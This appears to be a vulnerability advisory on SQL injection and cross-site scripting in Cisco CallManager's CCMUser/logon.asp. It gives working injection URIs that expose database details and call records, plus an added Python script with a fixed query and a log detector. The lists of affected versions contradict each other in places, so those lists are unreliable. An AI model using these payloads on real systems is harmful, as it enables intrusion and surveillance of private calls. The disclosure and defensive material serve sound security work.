Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
BID:25480
Info
| Bugtraq ID: | 25480 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-4633 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 29 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | The vendor disclosed these issues. |
| Vulnerable: | Cisco Unified Communications Manager 4.2(3)SR2, 4.2(3)SR2b; Cisco Unified CallManager 4.2(3)SR1, 4.2, 4.1(3)SR5, 4.1(3)SR4, 4.1(3)SR5b, 4.1, 4.0, 3.3(5)SR3, 3.3(5)SR2a, 3.3 |
| Not Vulnerable: | Cisco Unified Communications Manager 4.3(1)SR1, 4.2(3)SR2; Cisco Unified CallManager 4.1(3)SR5, 3.3(5)SR2b |
Discussion
Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability. The SQL injection is reachable through the lang parameter of the CCMUser/logon.asp login page; the proof-of-concept payloads show that the value is concatenated into a query that selects tkUserLocale from the UserLocaleBrowserLanguageMap table, so a crafted value can append arbitrary UNION and stacked statements.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code in a user's browser, compromise the application, access or modify data (the proof of concept below reads call detail records, including calling and called numbers and call timestamps), or exploit latent vulnerabilities in the underlying database.
Exploit / POC
To exploit the cross-site scripting vulnerability, an attacker entices an unsuspecting victim to follow a malicious URI. The SQL-injection vulnerability can be exploited directly from a browser: the lang parameter of CCMUser/logon.asp is placed inside a quoted string in a SQL statement, and each proof-of-concept value closes that string, appends a UNION SELECT that carries the attacker's chosen value into the page, starts a second statement after a semicolon, and ends with where ''=' so that the application's own trailing quote completes a syntactically valid statement. The syntax used (CURRENT_USER, db_name(), TOP 1, convert(), and the three-part name cdr..CallDetailRecord) is Transact-SQL, targeting the Microsoft SQL Server database behind CallManager. In the URIs below, www.example.com stands for the target host, + encodes a space, and %3C%3E encodes the <> (not equal) operator.
The following proof-of-concept URIs are available for the SQL-injection vulnerability:
To display the logged-in database user:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the selected database:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the UNIX time (dateTimeOrigination, seconds since the epoch) of a call made from extension 12345, read from the call detail record database:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the destination number for that call (replace 1174900000 with the value returned by the previous query):
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
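The following Python script is an added illustration and is not code from the advisory, from Cisco, or from the original reporter. It shows why the proof-of-concept values above parse as valid SQL once the login page appends its closing quote, contrasts the string-concatenation pattern with an allow-listed, parameterized query, and runs a simple detector over constructed web-server log lines for the same lang-parameter abuse. The query template (the column name BrowserLanguage in particular), the log layout and the log lines are assumptions made for the example; only the table, alias and column tkUserLocale come from the advisory's payloads.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Assumed shape of the statement behind CCMUser/logon.asp. The advisory's
# payloads only show "select tkUserLocale from UserLocaleBrowserLanguageMap M";
# the column compared against lang is not given, so "BrowserLanguage" is a
# placeholder used here for illustration only.
QUERY_TEMPLATE = ("select tkUserLocale from UserLocaleBrowserLanguageMap M "
                  "where M.BrowserLanguage = '{lang}'")

# Language tags the logon page legitimately receives, e.g. "en" or "en-us".
LANG_TAG = re.compile(r"[A-Za-z]{2,3}(?:-[A-Za-z]{2,4})?")

# Characters and keywords that never belong in a language tag but do appear
# in the advisory's payloads: quote, statement separator, comments, UNION/SELECT.
INJECTION_MARKERS = re.compile(r"'|;|--|/\*|\bunion\b|\bselect\b", re.IGNORECASE)


def vulnerable_query(lang: str) -> str:
    """String concatenation: the parameter becomes part of the SQL text."""
    return QUERY_TEMPLATE.format(lang=lang)


def hardened_query(lang: str) -> Tuple[str, Tuple[str]]:
    """Allow-list the value, then bind it as a parameter (ODBC '?' style)."""
    if not LANG_TAG.fullmatch(lang):
        raise ValueError("lang is not a language tag: %r" % lang)
    return ("select tkUserLocale from UserLocaleBrowserLanguageMap M "
            "where M.BrowserLanguage = ?", (lang,))


def quotes_balanced(sql: str) -> bool:
    """True when every single quote in the SQL text has a partner."""
    return sql.count("'") % 2 == 0


def statement_count(sql: str) -> int:
    """Count statements separated by ';' that sit outside string literals."""
    count, in_string = 1, False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        elif ch == ";" and not in_string:
            count += 1
    return count


def lang_from_query(query: str) -> Optional[str]:
    """Decode the lang value from a raw query string.

    Splits on '&' only: urllib's parse_qs in some Python releases also splits
    on ';', which would cut the stacked statement in half and hide it.
    """
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "lang":
            return unquote_plus(value)
    return None


def lang_from_uri(uri: str) -> Optional[str]:
    return lang_from_query(urlsplit(uri).query)


def is_suspicious_lang(value: Optional[str]) -> bool:
    return value is not None and INJECTION_MARKERS.search(value) is not None


# Constructed log lines (not real traffic) in an assumed minimal layout:
# date time client-ip method uri-stem uri-query status.
SAMPLE_LOG = """\
2007-08-29 10:01:02 10.0.0.5 GET /CCMUser/logon.asp lang=en 200
2007-08-29 10:01:09 10.0.0.7 GET /CCMUser/logon.asp lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' 200
2007-08-29 10:02:11 10.0.0.9 GET /CCMUser/logon.asp lang=fr 200
2007-08-29 10:02:40 10.0.0.9 GET /CCMUser/main.asp - 200
"""


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client, decoded lang) for logon.asp requests carrying SQL markers."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, path, query = fields[2], fields[4], fields[5]
        if path.lower() != "/ccmuser/logon.asp":
            continue
        lang = lang_from_query(query)
        if is_suspicious_lang(lang):
            hits.append((client, lang))
    return hits


if __name__ == "__main__":
    uri = ("https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+"
           "CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap"
           "+M+where+''='")
    injected = vulnerable_query(lang_from_uri(uri))
    print(injected)
    print("balanced quotes:", quotes_balanced(injected),
          "statements:", statement_count(injected))
    print("flagged:", scan_log(SAMPLE_LOG))
```

Running the script prints the concatenated statement for the first proof-of-concept URI: the quotes pair up and the text contains two statements, which is exactly what lets the attacker's UNION SELECT and stacked query reach the database. The hardened variant rejects the value before it is ever bound, and the log scan flags the one client that sent it; the detector deliberately decodes the value itself so that a `;` inside the payload is not mistaken for a parameter separator.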
Solution / Fix
Solution:
The vendor has published a security advisory (referenced below) detailing the updates that address these issues; the fixed releases are those listed under Not Vulnerable above. Please contact the vendor for details on obtaining and applying the appropriate updates.
References
References:
- Cisco Homepage (Cisco)
- Cisco Unified Communications Manager (CallManager) (Cisco)
- Cisco Security Advisory: XSS and SQL Injection in Cisco CallManager/Unified Communications Manager (Cisco)
- SQL Injection in Cisco CallManager (Elliot Kendall)